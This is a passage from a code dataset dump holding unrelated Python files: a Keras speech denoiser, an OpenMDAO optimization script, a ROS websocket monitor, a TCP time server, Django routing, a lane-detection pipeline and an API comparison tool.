tf.keras.layers.ZeroPadding2D(((4,4), (0,0)))(x)\n x = Conv2D(filters=18, kernel_size=[9,8], strides=[1, 1], padding='valid', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n\n skip0 = Conv2D(filters=30, kernel_size=[5,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = Activation('relu')(skip0)\n x = BatchNormalization()(x)\n\n x = Conv2D(filters=8, kernel_size=[9,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n\n # -----\n x = Conv2D(filters=18, kernel_size=[9,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n\n skip1 = Conv2D(filters=30, kernel_size=[5,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = Activation('relu')(skip1)\n x = BatchNormalization()(x)\n\n x = Conv2D(filters=8, kernel_size=[9,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n\n # ----\n x = Conv2D(filters=18, kernel_size=[9,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n \n x = Conv2D(filters=30, kernel_size=[5,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n\n x = Conv2D(filters=8, kernel_size=[9,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n\n # ----\n x = Conv2D(filters=18, kernel_size=[9,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n\n x = Conv2D(filters=30, kernel_size=[5,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = x + skip1\n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n\n x = Conv2D(filters=8, 
kernel_size=[9,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n\n # ----\n x = Conv2D(filters=18, kernel_size=[9,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n\n x = Conv2D(filters=30, kernel_size=[5,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = x + skip0\n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n\n x = Conv2D(filters=8, kernel_size=[9,1], strides=[1, 1], padding='same', use_bias=False,\n kernel_regularizer=tf.keras.regularizers.l2(l2_strength))(x)\n x = Activation('relu')(x)\n x = BatchNormalization()(x)\n\n # ----\n x = tf.keras.layers.SpatialDropout2D(0.2)(x)\n x = Conv2D(filters=1, kernel_size=[129,1], strides=[1, 1], padding='same')(x)\n\n model = Model(inputs=inputs, outputs=x)\n\n optimizer = tf.keras.optimizers.Adam(3e-4)\n #optimizer = RAdam(total_steps=10000, warmup_proportion=0.1, min_lr=3e-4)\n\n model.compile(optimizer=optimizer, loss='mse', \n metrics=[tf.keras.metrics.RootMeanSquaredError('rmse')])\n return model\n \n def prepare_input_features(self,stft_features):\n # Phase Aware Scaling: To avoid extreme differences (more than\n # 45 degree) between the noisy and clean phase, the clean spectral magnitude was encoded as similar to [21]:\n noisySTFT = np.concatenate([stft_features[:,0:numSegments-1], stft_features], axis=1)\n stftSegments = np.zeros((numFeatures, numSegments , noisySTFT.shape[1] - numSegments + 1))\n\n for index in range(noisySTFT.shape[1] - numSegments + 1):\n stftSegments[:,:,index] = noisySTFT[:,index:index + numSegments]\n return stftSegments\n\n def removeNoise(self,features, phase, cleanMean=None, cleanStd=None,noiseAudioFeatureExtractor=None):\n # scale the outputs back to the original range\n if cleanMean and cleanStd:\n features = cleanStd * features + cleanMean\n\n phase = np.transpose(phase, (1, 0))\n features = np.squeeze(features)\n\n # features = librosa.db_to_power(features)\n features = features * np.exp(1j * phase) # that fixes the abs() op previously done\n\n features = np.transpose(features, (1, 0))\n return noiseAudioFeatureExtractor.get_audio_from_stft_spectrogram(features)\n\n def resample_ratecv(self,data,samplerate=48000, resample_rate=16000):\n #Resamples the given PCM stream to resample_rate.\n return audioop.ratecv((bytearray(data)), 2, 1, samplerate, resample_rate, None)\n\n def get_all_samples(self,data):\n allsamples=[]\n index=0\n while True:\n try:\n index=index+1\n sample=audioop.getsample(data,2,index)\n sample_8a = sample & 0xff\n sample_8b = (sample >> 8) & 0xff\n allsamples.append(int(str(sample_8a)))\n allsamples.append(int(str(sample_8b)))\n except:\n break\n\n return allsamples\n\n def __init__(self):\n print(\"Init\")\n self.model = self.build_model(l2_strength=0.0)\n self.model.load_weights(os.path.dirname(__file__)+'./model/cnn-audio.h5')\n\n def reduceNoiseMain(self,noisyAudio):\n noiseAudioFeatureExtractor = FeatureExtractor(noisyAudio, windowLength=windowLength, overlap=overlap, sample_rate=16000)\n noise_stft_features = noiseAudioFeatureExtractor.get_stft_spectrogram()\n noisyPhase = np.angle(noise_stft_features)\n noise_stft_features = np.abs(noise_stft_features)\n\n mean = np.mean(noise_stft_features)\n std = np.std(noise_stft_features)\n noise_stft_features = 
(noise_stft_features - mean) / std\n\n predictors = self.prepare_input_features(noise_stft_features)\n predictors = np.reshape(predictors, (predictors.shape[0], predictors.shape[1], 1, predictors.shape[2]))\n predictors = np.transpose(predictors, (3, 0, 1, 2)).astype(np.float32)\n\n STFTFullyConvolutional = self.model.predict(predictors)\n\n denoisedAudioFullyConvolutional = self.removeNoise(STFTFullyConvolutional, noisyPhase, mean, std,noiseAudioFeatureExtractor)\n\n from scipy.io.wavfile import write as scipyWrite\n scipyWrite('tmp_f.wav', 16000, denoisedAudioFullyConvolutional)\n\n \n #Test if it worked\n # sd.play(data=noisyAudio , samplerate= fs)\n\n # import matplotlib.pyplot as plt\n\n # f, (ax2, ax3) = plt.subplots(2, 1, sharey=True)\n # ax2.plot(noisyAudio)\n # ax2.set_title(\"Noisy Audio\")\n\n # ax3.plot(denoisedAudioFullyConvolutional)\n # ax3.set_title(\"Denoised Audio\")\n\n # f.show()\n\n","sub_path":"Audio/SpeechDenoiserCNN/SpeechDenoiser.py","file_name":"SpeechDenoiser.py","file_ext":"py","file_size_in_byte":9094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"91962467","text":"\"\"\" Optimization of the CADRE MDP.\"\"\"\n\nfrom __future__ import print_function\nfrom six.moves import range\n\nimport numpy as np\n\nfrom openmdao.core.mpi_wrap import MPI\nfrom openmdao.core.problem import Problem\nfrom openmdao.drivers.pyoptsparse_driver import pyOptSparseDriver\n\ntry:\n from openmdao.core.petsc_impl import PetscImpl as impl\nexcept ImportError:\n impl = None\n\nfrom openmdao.solvers.ln_gauss_seidel import LinearGaussSeidel\nfrom openmdao.solvers.petsc_ksp import PetscKSP\n\nfrom CADRE.CADRE_mdp import CADRE_MDP_Group\n\n# These numbers are for the CADRE problem in the paper.\nn = 1500\nm = 300\nnpts = 6\nrestart = False\n\n# These numbers are for quick testing\n#n = 150\n#m = 6\n#npts = 2\n\n\n# Instantiate\nmodel = Problem(impl=impl)\nroot = model.root = CADRE_MDP_Group(n=n, m=m, npts=npts)\n\n# add SNOPT driver\nmodel.driver = pyOptSparseDriver()\nmodel.driver.options['optimizer'] = \"SNOPT\"\nmodel.driver.opt_settings = {'Major optimality tolerance': 1e-3,\n 'Major feasibility tolerance': 1.0e-5,\n 'Iterations limit': 500000000}\n\n# Add parameters and constraints to each CADRE instance.\nnames = ['pt%s' % i for i in range(npts)]\nfor i, name in enumerate(names):\n\n # add parameters to driver\n model.driver.add_desvar(\"%s.CP_Isetpt\" % name, lower=0., upper=0.4)\n model.driver.add_desvar(\"%s.CP_gamma\" % name, lower=0, upper=np.pi/2.)\n model.driver.add_desvar(\"%s.CP_P_comm\" % name, lower=0., upper=25.)\n model.driver.add_desvar(\"%s.iSOC\" % name, indices=[0], lower=0.2, upper=1.)\n\n model.driver.add_constraint('%s.ConCh'% name, upper=0.0)\n model.driver.add_constraint('%s.ConDs'% name, upper=0.0)\n model.driver.add_constraint('%s.ConS0'% name, upper=0.0)\n model.driver.add_constraint('%s.ConS1'% name, upper=0.0)\n model.driver.add_constraint('%s_con5.val'% name, equals=0.0)\n\n# Add Parameter groups\nmodel.driver.add_desvar(\"bp1.cellInstd\", lower=0., upper=1.0)\nmodel.driver.add_desvar(\"bp2.finAngle\", lower=0., upper=np.pi/2.)\nmodel.driver.add_desvar(\"bp3.antAngle\", lower=-np.pi/4, upper=np.pi/4)\n\n# Add objective\nmodel.driver.add_objective('obj.val')\n\n# For Parallel exeuction, we must use KSP or LinearGS\n#model.root.ln_solver = PetscKSP()\nmodel.root.ln_solver = LinearGaussSeidel()\nmodel.root.parallel.ln_solver = LinearGaussSeidel()\nmodel.root.parallel.pt0.ln_solver = LinearGaussSeidel()\nmodel.root.parallel.pt1.ln_solver = LinearGaussSeidel()\nmodel.root.parallel.pt2.ln_solver = LinearGaussSeidel()\nmodel.root.parallel.pt3.ln_solver = LinearGaussSeidel()\nmodel.root.parallel.pt4.ln_solver = LinearGaussSeidel()\nmodel.root.parallel.pt5.ln_solver = LinearGaussSeidel()\n\n# Parallel Derivative calculation\nfor con_name in ['.ConCh','.ConDs','.ConS0','.ConS1','_con5.val']:\n model.driver.parallel_derivs(['%s%s'%(n,con_name) for n in names])\n\n# Recording\n# Some constraints only exit on one process so cannot record everything\nrecording_includes_options = ['obj.val']\nfor j in range(npts):\n recording_includes_options.append('pt%s.ConCh' % str(j))\n recording_includes_options.append('pt%s.ConDs' % str(j))\n recording_includes_options.append('pt%s.ConS0' % str(j))\n recording_includes_options.append('pt%s.ConS1' % str(j))\n recording_includes_options.append('pt%s_con5.val' % str(j))\n\nfrom openmdao.recorders.sqlite_recorder import SqliteRecorder\nrec = SqliteRecorder(out='data.sql')\nmodel.driver.add_recorder(rec)\nrec.options['includes'] = recording_includes_options\nrec.options['record_derivs'] = 
False\n\nmodel.setup()\nmodel.run()\n\nimport resource\nprint(\"Memory Usage:\", resource.getrusage(resource.RUSAGE_SELF).ru_maxrss/1000.0, \"MB (on unix)\")\n\n#----------------------------------------------------------------\n# Below this line, code I was using for verifying and profiling.\n#----------------------------------------------------------------\n#profile = False\n#params = list(model.driver.get_desvars().keys())\n#unks = list(model.driver.get_objectives().keys()) + list(model.driver.get_constraints().keys())\n#if profile is True:\n# import cProfile\n# import pstats\n# def zzz():\n# for j in range(1):\n# model.run()\n# cProfile.run(\"model.calc_gradient(params, unks, mode='rev', return_format='dict')\", 'profout')\n# #cProfile.run(\"zzz()\", 'profout')\n# p = pstats.Stats('profout')\n# p.strip_dirs()\n# p.sort_stats('cumulative', 'time')\n# p.print_stats()\n# print('\\n\\n---------------------\\n\\n')\n# p.print_callers()\n# print('\\n\\n---------------------\\n\\n')\n# p.print_callees()\n#else:\n# #model.check_total_derivatives()\n# Ja = model.calc_gradient(params, unks, mode='rev', return_format='dict')\n# for key1, value in sorted(Ja.items()):\n# for key2 in sorted(value.keys()):\n# print(key1, key2)\n# print(value[key2])\n# #print(Ja)\n# #Jf = model.calc_gradient(params, unks, mode='fwd', return_format='dict')\n# #print(Jf)\n# #Jf = model.calc_gradient(params, unks, mode='fd', return_format='dict')\n# #print(Jf)\n# import pickle\n# pickle.dump(Ja, open( \"mdp_derivs.p\", \"wb\" ))\n#\n#import pickle\n#data = {}\n#varlist = []\n#picklevars = ['obj.val',\n #'pt0_con1.val', 'pt0_con2.val', 'pt0_con3.val', 'pt0_con4.val', 'pt0_con5.val',\n #'pt1_con1.val', 'pt1_con2.val', 'pt1_con3.val', 'pt1_con4.val', 'pt1_con5.val',\n #]\n#for var in picklevars:\n #data[var] = model[var]\n#pickle.dump(data, open( \"mdp_execute.p\", \"wb\" ))\n","sub_path":"example_mdp.py","file_name":"example_mdp.py","file_ext":"py","file_size_in_byte":5456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"69651523","text":"#!/usr/bin/env python\nimport rospy\nimport sys\nimport json\nimport yaml\nimport websocket\nfrom threading import *\nfrom rospy_message_converter import message_converter\nfrom monitor.msg import *\nfrom std_msgs.msg import String\n\nws_lock = Lock()\ndict_msgs = {}\nfrom gazebo_radiation_plugins.msg import Simulated_Radiation_Msg\n\ndef callback_radiation_sensor_plugin_sensor_0(data):\n\tglobal ws, ws_lock\n\trospy.loginfo('monitor has observed: ' + str(data))\n\tdict = message_converter.convert_ros_message_to_dictionary(data)\n\tdict['topic'] = '/radiation_sensor_plugin/sensor_0'\n\tdict['time'] = rospy.get_time()\n\tws_lock.acquire()\n\twhile dict['time'] in dict_msgs:\n\t\tdict['time'] += 0.01\n\tws.send(json.dumps(dict))\n\tdict_msgs[dict['time']] = data\n\tws_lock.release()\n\trospy.loginfo('event propagated to oracle')\npub_dict = {}\nmsg_dict = { '/radiation_sensor_plugin/sensor_0' : \"gazebo_radiation_plugins/Simulated_Radiation_Msg\"}\ndef monitor():\n\tglobal pub_error, pub_verdict\n\twith open(log, 'w') as log_file:\n\t\tlog_file.write('')\n\trospy.init_node('radiation_monitor_orange', anonymous=True)\n\tpub_error = rospy.Publisher(name = 'radiation_monitor_orange/monitor_error', data_class = MonitorError, latch = True, queue_size = 1000)\n\tpub_verdict = rospy.Publisher(name = 'radiation_monitor_orange/monitor_verdict', data_class = String, latch = True, queue_size = 1000)\n\trospy.Subscriber('/radiation_sensor_plugin/sensor_0', Simulated_Radiation_Msg, callback_radiation_sensor_plugin_sensor_0)\n\trospy.loginfo('monitor started and ready')\ndef on_message(ws, message):\n\tglobal error, log, actions\n\tjson_dict = json.loads(message)\n\tif json_dict['verdict'] == 'true' or json_dict['verdict'] == 'currently_true' or json_dict['verdict'] == 'unknown':\n\t\tif json_dict['verdict'] == 'true' and not pub_dict:\n\t\t\trospy.loginfo('The monitor concluded the satisfaction of the property under analysis, and can be safely removed.')\n\t\t\tws.close()\n\t\t\texit(0)\n\t\telse:\n\t\t\tlogging(json_dict)\n\t\t\ttopic = json_dict['topic']\n\t\t\trospy.loginfo('The event ' + message + ' is consistent and republished')\n\t\t\tif topic in pub_dict:\n\t\t\t\tpub_dict[topic].publish(dict_msgs[json_dict['time']])\n\t\t\tdel dict_msgs[json_dict['time']]\n\telse:\n\t\tlogging(json_dict)\n\t\tif (json_dict['verdict'] == 'false' and actions[json_dict['topic']][1] >= 1) or (json_dict['verdict'] == 'currently_false' and actions[json_dict['topic']][1] == 1):\n\t\t\trospy.loginfo('The event ' + message + ' is inconsistent..')\n\t\t\terror = MonitorError()\n\t\t\terror.topic = json_dict['topic']\n\t\t\terror.time = json_dict['time']\n\t\t\terror.property = json_dict['spec']\n\t\t\terror.content = str(dict_msgs[json_dict['time']])\n\t\t\tpub_error.publish(error)\n\t\t\tif json_dict['verdict'] == 'false' and not pub_dict:\n\t\t\t\trospy.loginfo('The monitor concluded the violation of the property under analysis, and can be safely removed.')\n\t\t\t\tws.close()\n\t\t\t\texit(0)\n\t\tif actions[json_dict['topic']][0] != 'filter':\n\t\t\tif json_dict['verdict'] == 'currently_false':\n\t\t\t\trospy.loginfo('The event ' + message + ' is consistent ')\n\t\t\ttopic = json_dict['topic']\n\t\t\tif topic in pub_dict:\n\t\t\t\tpub_dict[topic].publish(dict_msgs[json_dict['time']])\n\t\t\tdel dict_msgs[json_dict['time']]\n\t\terror = True\n\tpub_verdict.publish(json_dict['verdict'])\n\ndef on_error(ws, error):\n\trospy.loginfo(error)\n\ndef on_close(ws):\n\trospy.loginfo('### websocket 
closed ###')\n\ndef on_open(ws):\n\trospy.loginfo('### websocket is open ###')\n\ndef logging(json_dict):\n\ttry:\n\t\twith open(log, 'a+') as log_file:\n\t\t\tlog_file.write(json.dumps(json_dict) + '\\n')\n\t\trospy.loginfo('event logged')\n\texcept:\n\t\trospy.loginfo('Unable to log the event.')\n\ndef main(argv):\n\tglobal log, actions, ws\n\tlog = '/media/angelo/WorkData/git/radiation_ws/src/monitor/log_radiation_orange.txt' \n\tactions = {\n\t\t'/radiation_sensor_plugin/sensor_0' : ('log', 1)\n\t}\n\tmonitor()\n\twebsocket.enableTrace(False)\n\tws = websocket.WebSocketApp(\n\t\t'ws://127.0.0.1:8080',\n\t\ton_message = on_message,\n \n\t\ton_error = on_error,\n\t\ton_close = on_close,\n\t\ton_open = on_open)\n\tws.run_forever()\n\nif __name__ == '__main__':\n\tmain(sys.argv)","sub_path":"monitor/src/radiation_monitor_orange.py","file_name":"radiation_monitor_orange.py","file_ext":"py","file_size_in_byte":4050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"99897251","text":"# -*- coding: utf-8 -*-\r\n\r\n# -*- coding: utf-8 -*-\r\n\r\n\r\nfrom sys import stdin\r\nimport itertools\r\n\r\nimport time\r\nfd = open('d.txt')\r\nstdin = fd\r\nstart=time.time()\r\n\r\n############################################\r\n\r\n# read data for n sequences.\r\ntemp = stdin.readline().split()\r\nN = int(temp[0])\r\nM = int(temp[1])\r\n\r\nA = stdin.readline().split()\r\ncard = []\r\nfor i in A:\r\n card.append(int(i))\r\ncard=sorted(card)\r\n#print(card)\r\n\r\ndata = []\r\nfor i in range(M):\r\n write = stdin.readline().split()\r\n data.append(write)\r\n\r\nfor sousa in data:\r\n # sort card every time\r\n card=sorted(card)\r\n for i in range(int(sousa[0])):\r\n if card[i] < int(sousa[1]):\r\n card[i] = int(sousa[1])\r\n else:\r\n break\r\n\r\nprint(sum(card))\r\n\r\nprint(time.time()-start)","sub_path":"abc127/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"646134698","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport socket # socket模块\r\nimport datetime\r\n\r\nHOST = '0.0.0.0'\r\nPORT = 3434\r\n\r\n# AF_INET说明使用IPv4地址, SOCK_STREAM指明TCP协议\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.bind((HOST, PORT)) # 绑定IP与端口\r\ns.listen(1) # 监听\r\n\r\nwhile True:\r\n conn, addr = s.accept() # 接收TCP连接,并返回新的socket\r\n print('Client %s connected!' % str(addr)) # 输出客户端的IP地址\r\n dt = datetime.datetime.now()\r\n message = \"Current time is \" + str(dt)\r\n conn.send(message.encode('utf8')) # 给客户端发送当前时间\r\n print(\"Sent: \", message)\r\n conn.close() # 关闭连接\r\n","sub_path":"code/chapter02/2-1_server.py","file_name":"2-1_server.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"224327214","text":"\"\"\"monstertracker URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.urls import include, path\r\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.contrib import admin\r\nfrom django.urls import path, include\r\nfrom monstertracker import views\r\n\r\nurlpatterns = [\r\n path('admin/', admin.site.urls),\r\n path('list/', views.apiOverview),\r\n path('test/', views.testCalculateProfit),\r\n path('sortedProfit/', views.sortedProfit),\r\n path('monsters/', views.monsters),\r\n path('calculateProfit/', views.calculateProfit),\r\n path('updateProfit/', views.updateProfit),\r\n path('monster//', views.monster)\r\n]\r\n","sub_path":"monstertracker/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"16995981","text":"import numpy as np\nimport cv2\nfrom CameraCalibration import ReadCameraCalibrationMatrix, UndistortImage\nfrom ImageSourceGrabber import ImageSourceGrabber\nfrom PerspectiveTransformer import PerspectiveTransformer\nfrom ImageThresholder import ImageThresholder\nfrom LaneDetector import LaneDetector\nimport matplotlib.pyplot as plt\nfrom ImageSourceGrabber import ImageSourceGrabber\nfrom VideoSourceGrabber import VideoSourceGrabber\n\n#Read the camera calibration matrix\ncameraMatrix, distCoeffs = ReadCameraCalibrationMatrix()\n\nsrc_top_right = [713, 449]\nsrc_bottom_right = [1101, 623]\nsrc_bottom_left = [224, 623]\nsrc_top_left = [582, 449]\n\n# dst_top_right = [907, 449]\n# dst_bottom_right = [907, 623]\n# dst_bottom_left = [403, 623]\n# dst_top_left = [403, 449]\n\n#Original\n# dst_top_right = [1120, 90]\n# dst_bottom_right = [1120, 630]\n# dst_bottom_left = [160, 630]\n# dst_top_left = [160, 90]\n\ndst_top_right = [1120, 0]\ndst_bottom_right = [1120, 720]\ndst_bottom_left = [160, 720]\ndst_top_left = [160, 0]\n\n\ndef PrepareColoredThresholdedImage(thresholded_image):\n thresholded_image_left = thresholded_image.copy() * 255\n thresholded_image_right = thresholded_image.copy() * 255\n thresholded_image_left[:, int(thresholded_image.shape[1] / 2):thresholded_image.shape[1]] = 0\n thresholded_image_right[:,0:int(thresholded_image.shape[1]/2)] = 0\n colored_image = np.dstack((thresholded_image_right,np.zeros_like(thresholded_image),thresholded_image_left))\n return colored_image\n\n\ndef Pipeline(image):\n # Initialize perspective transformer\n perspectiveTransformer = PerspectiveTransformer(\n np.float32([src_top_right, src_bottom_right, src_bottom_left, src_top_left]),\n np.float32([dst_top_right, dst_bottom_right, dst_bottom_left, dst_top_left])\n )\n\n # Initialize image thresholder\n thresholder = ImageThresholder()\n\n # Initialize histogram\n laneDetector = LaneDetector()\n\n #Perform image undistortion\n undistorted_image = UndistortImage(image, cameraMatrix, distCoeffs)\n\n #Perform perspective transform\n perspective_transformed = perspectiveTransformer.TransformImage(undistorted_image)\n\n #Perform thresholding\n thresholded_image, _, _, _, _, _, _ = thresholder.Perform(perspective_transformed)\n\n #Calculate the histogram\n centroids = laneDetector.FindWindowCentroids(thresholded_image)\n centroids_image = laneDetector.DrawWindowCentroids(thresholded_image, centroids)\n left_poly, right_poly = laneDetector.FitAPolyline(thresholded_image, centroids)\n poly_region_image = laneDetector.DrawPolylines(undistorted_image, left_poly, right_poly)\n radius_left = laneDetector.FindRadiusOfCurvature(left_poly, 720)\n radius_right = laneDetector.FindRadiusOfCurvature(right_poly, 720)\n curvature = (radius_left + radius_right) / 2.0\n center = laneDetector.CarPosition(left_poly, right_poly)\n\n #Apply inverse transform on lane region\n lane_detector_region = perspectiveTransformer.InverseTransformImage(poly_region_image)\n\n pipeline_output = cv2.addWeighted(undistorted_image, 1, lane_detector_region, 0.3, 0)\n\n\n return pipeline_output, undistorted_image, thresholded_image, perspective_transformed, centroids_image, poly_region_image, lane_detector_region, curvature, center\n\n\nif __name__ == \"__main__\":\n #Create the image grabber\n #imageGrabber = ImageSourceGrabber(\"/home/engin/Documents/Projects/CarND/CarND-Advanced-Lane-Lines/test_images\")\n imageGrabber = 
VideoSourceGrabber(\"/home/engin/Documents/Projects/CarND/CarND-Advanced-Lane-Lines/project_video.mp4\")\n # imageGrabber = VideoSourceGrabber(\"/home/engin/Documents/new_clip.mov\")\n # imageGrabber = VideoSourceGrabber(\"/home/engin/sub2.mov\")\n #imageGrabber = VideoSourceGrabber(\"/home/engin/sub3.mov\")\n #imageGrabber = VideoSourceGrabber(\"/home/engin/Documents/Projects/CarND/CarND-Advanced-Lane-Lines/challenge_video.mp4\")\n\n imageGrabber.Init()\n\n counter = 0\n while imageGrabber.HasNext():\n image = imageGrabber.GrabImage()\n if image is None:\n break\n #image = cv2.imread(\"/home/engin/Documents/Projects/CarND/CarND-Advanced-Lane-Lines/test_images/test3.jpg\")\n\n pipeline_output, undistorted_image, thresholded_image, \\\n image, centroids_image, poly_image, \\\n lane_detector_region, curvature, center = Pipeline(image)\n\n cv2.putText(pipeline_output, \"Curvature: {0:.2f} m\".format(curvature), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,255,255), 1)\n cv2.putText(pipeline_output, \"Center: {0:.2f} m\".format(center), (10, 50), cv2.FONT_HERSHEY_SIMPLEX,\n 0.5, (0, 255, 255), 1)\n\n\n cv2.imshow(\"ThresholdedImage\", thresholded_image * 255)\n cv2.imshow(\"Image\", image)\n cv2.imshow(\"Centroids\", centroids_image)\n cv2.imshow(\"PolylineImage\", poly_image)\n cv2.imshow(\"LaneDetectorRegion\", lane_detector_region)\n cv2.imshow(\"Weighted\", pipeline_output)\n\n cv2.imwrite(\"./test_images_out/{}.png\".format(counter), pipeline_output)\n counter = counter + 1\n cv2.waitKey(10)\n","sub_path":"LaneFindingPipeline.py","file_name":"LaneFindingPipeline.py","file_ext":"py","file_size_in_byte":5080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"48846400","text":"\r\nfrom django import template\r\n#代替safe\r\nfrom django.utils.safestring import mark_safe\r\nregister = template.Library()\r\nimport re\r\n\r\ndef make_url(s_url):\r\n '''\r\n 通用组织url的参数\r\n :param s_url:\r\n :return: url前面的路径,和后面的参数字典,重新组合:\"&\".join(param_dict.values()\r\n '''\r\n param_dict = {}\r\n path_info = s_url.split(\"?\")\r\n if len(path_info) == 2:\r\n path_info,params_str=path_info\r\n else:\r\n params_str = \"\"\r\n\r\n if params_str:\r\n params = params_str.split(\"&\")\r\n for param in params:\r\n key, value = param.split(\"=\")\r\n param_dict[key] = \"%s=%s\" % (key, value)\r\n else:\r\n param_dict={}\r\n return path_info,param_dict\r\n\r\n\r\n@register.simple_tag\r\ndef make_url_for_delete(s_url,d_path,action,bid):\r\n '''\r\n 传入url,生成url,为delete组织url\r\n action 操作:删除/放入回收站\r\n bid 编号\r\n '''\r\n\r\n path_info,param_dict=make_url(s_url)\r\n\r\n param_dict[\"action\"]=\"action=%s\"%(action)\r\n param_dict[\"bid\"]=\"bid=%s\"%(bid)\r\n\r\n params=\"&\".join(param_dict.values())\r\n\r\n\r\n\r\n\r\n\r\n\r\n # for k,v in url.items():\r\n # param_dict[k]=\"%s=%s\"%(k,v)\r\n # param_dict[\"_page\"]=\"%s=%s\"%(\"_page\",page_value)\r\n #\r\n # print(param_dict)\r\n # url=\"%s?%s\"%(url,\"&\".join(param_dict.values()))\r\n\r\n url=\"%s?%s\"%(d_path,params)\r\n return url\r\n","sub_path":"backend/templatetags/template_tools.py","file_name":"template_tools.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"524518864","text":"import requests\nimport traceback\nfrom Classes.Reader import Read_APIs\nfrom Classes.Api_Compare import Api_Compare\n\nimport json\nimport sys\nimport os\nsys.path.append(os.path.join(os.path.dirname(__file__), \"..\", \"..\"))\n\n\nclass Read_Compare_Api_Response():\n def Get_Request(self):\n count = 0\n for j in range (len(L1)):\n for k in range (len(L2)):\n if j == k:\n try :\n request1 = requests.get(L1[j])\n request2 = requests.get(L2[k])\n print(request1, request2)\n except :\n print(\"Catch Exception--> [Something went wrong]\")\n print(traceback.format_exc())\n\n try :\n with open(\"Data/Response1.txt\", 'w') as inputfile_1:\n json.dump(request1.json(),inputfile_1,indent = 4,ensure_ascii = False)\n inputfile_1.close()\n except ValueError :\n print(\"Catch Exception --> json.decoder.JSONDecodeError : API request did not fetch any response from request1 \\n\")\n #print(traceback.format_exc())\n\n try:\n with open(\"Data/Response2.txt\", 'w') as inputfile_2:\n json.dump(request2.json(), inputfile_2 ,indent=4, ensure_ascii=False)\n inputfile_2.close()\n except ValueError :\n print(\"Catch Exception --> json.decoder.JSONDecodeError : API request did not fetch any response for request2 \\n \")\n #print(traceback.format_exc())\n\n M = Api_Compare.Compare_Request(self)\n\n if 0 not in M:\n print(L1[j] + \" equals \" + L2[k])\n count = count + 1\n\n else:\n print(L1[j] + \" not equals \" + L2[k])\n count = count + 1\n\n\nif __name__ == \"__main__\":\n Req = Read_APIs\n L1 = Req.List_URL1\n L2 = Req.List_URL2\n cmd_file1,cmd_file2 = sys.argv[1], sys.argv[2]\n Req.Read_File1(Read_APIs,cmd_file1)\n Req.Read_File2(Read_APIs,cmd_file2)\n Obj = Read_Compare_Api_Response.Get_Request(Read_Compare_Api_Response)","sub_path":"Classes/Comparator.py","file_name":"Comparator.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
